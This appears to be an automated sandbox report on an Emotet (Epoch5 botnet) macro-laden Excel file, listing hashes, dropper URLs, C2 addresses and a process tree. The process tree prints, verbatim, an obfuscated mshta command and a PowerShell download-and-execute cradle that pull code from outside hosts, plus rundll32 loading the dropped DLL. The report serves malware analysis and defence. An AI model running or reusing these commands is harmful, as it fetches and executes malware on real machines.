Analysis

  • max time kernel
    153s
  • max time network
    156s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    20-01-2022 02:10

General

  • Target

    745d54c9957257622f8009a18c4ecf6d99a2f407ed5dd0cb211649fbfe4d2b90.xlsm

  • Size

    115KB

  • MD5

    f00afd4f894ae4e0536dd0950e125b59

  • SHA1

    cb54baba37c881782c0ef9b7cb378b37dd998902

  • SHA256

    745d54c9957257622f8009a18c4ecf6d99a2f407ed5dd0cb211649fbfe4d2b90

  • SHA512

    cd07dd00b0a1615a480555ed2f9bc7b075782d084e512cf484e7f66705d06bf8b2059c6397bbff0396df70a58b9f5c7eff5204bc97741bc8e5e6ec16b2a4b6f4

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/se1.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.195/sec/se1.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\745d54c9957257622f8009a18c4ecf6d99a2f407ed5dd0cb211649fbfe4d2b90.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2672
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:960
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1240
        • C:\Windows\system32\mshta.exe
          mshta http://0x5cff39c3/sec/se1.html
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:4060
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3920
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2192
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2372
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:632
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Tsldxjaclxmldsm\czeoi.sqg",zCaWBVvrN
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3496
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Tsldxjaclxmldsm\czeoi.sqg",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1412
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 4060 -s 1664
            4⤵
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3880

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    System Information Discovery

    3
    T1082

    Query Registry

    2
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\ssd.dll
      MD5

      aba34d4713318f41d80542af587fd288

      SHA1

      539dad8b9c00bce051ecb2611640894ced299d6c

      SHA256

      21c4238dac42a23d94e4aa45e91bb0c3be79bcb1a3894f3eed594d0b59888b55

      SHA512

      5169d1cc750c9a30a9aa334d24b5defbf10822d76185919b2c0bc11e1fddb7b6d23deb15f7128457985f3cf56dccebba46d710a657fada1bd28858a3be285755

    • \Users\Public\Documents\ssd.dll
      MD5

      aba34d4713318f41d80542af587fd288

      SHA1

      539dad8b9c00bce051ecb2611640894ced299d6c

      SHA256

      21c4238dac42a23d94e4aa45e91bb0c3be79bcb1a3894f3eed594d0b59888b55

      SHA512

      5169d1cc750c9a30a9aa334d24b5defbf10822d76185919b2c0bc11e1fddb7b6d23deb15f7128457985f3cf56dccebba46d710a657fada1bd28858a3be285755

    • \Users\Public\Documents\ssd.dll
      MD5

      aba34d4713318f41d80542af587fd288

      SHA1

      539dad8b9c00bce051ecb2611640894ced299d6c

      SHA256

      21c4238dac42a23d94e4aa45e91bb0c3be79bcb1a3894f3eed594d0b59888b55

      SHA512

      5169d1cc750c9a30a9aa334d24b5defbf10822d76185919b2c0bc11e1fddb7b6d23deb15f7128457985f3cf56dccebba46d710a657fada1bd28858a3be285755

    • memory/632-622-0x0000000005790000-0x00000000057B8000-memory.dmp
      Filesize

      160KB

    • memory/632-612-0x0000000005620000-0x0000000005648000-memory.dmp
      Filesize

      160KB

    • memory/632-610-0x00000000055C0000-0x00000000055E8000-memory.dmp
      Filesize

      160KB

    • memory/632-608-0x0000000005560000-0x0000000005588000-memory.dmp
      Filesize

      160KB

    • memory/632-606-0x0000000005480000-0x00000000054A8000-memory.dmp
      Filesize

      160KB

    • memory/632-604-0x00000000053A0000-0x00000000053C8000-memory.dmp
      Filesize

      160KB

    • memory/1412-627-0x0000000004EE0000-0x0000000004F08000-memory.dmp
      Filesize

      160KB

    • memory/1412-625-0x0000000003530000-0x0000000003558000-memory.dmp
      Filesize

      160KB

    • memory/2372-590-0x0000000004330000-0x0000000004358000-memory.dmp
      Filesize

      160KB

    • memory/2672-129-0x00007FFEEC6D0000-0x00007FFEEC6E0000-memory.dmp
      Filesize

      64KB

    • memory/2672-115-0x00007FFEEF820000-0x00007FFEEF830000-memory.dmp
      Filesize

      64KB

    • memory/2672-128-0x00007FFEEC6D0000-0x00007FFEEC6E0000-memory.dmp
      Filesize

      64KB

    • memory/2672-119-0x00007FFEEF820000-0x00007FFEEF830000-memory.dmp
      Filesize

      64KB

    • memory/2672-118-0x00007FFEEF820000-0x00007FFEEF830000-memory.dmp
      Filesize

      64KB

    • memory/2672-117-0x00007FFEEF820000-0x00007FFEEF830000-memory.dmp
      Filesize

      64KB

    • memory/2672-116-0x00007FFEEF820000-0x00007FFEEF830000-memory.dmp
      Filesize

      64KB

    • memory/3920-533-0x0000012FE1210000-0x0000012FF93E0000-memory.dmp
      Filesize

      385.8MB

    • memory/3920-477-0x0000012FE1210000-0x0000012FF93E0000-memory.dmp
      Filesize

      385.8MB

    • memory/3920-414-0x0000012FE1210000-0x0000012FF93E0000-memory.dmp
      Filesize

      385.8MB

    • memory/3920-340-0x0000012FF99C0000-0x0000012FF9A36000-memory.dmp
      Filesize

      472KB

    • memory/3920-313-0x0000012FF9350000-0x0000012FF938C000-memory.dmp
      Filesize

      240KB

    • memory/3920-275-0x0000012FE11C0000-0x0000012FE11E2000-memory.dmp
      Filesize

      136KB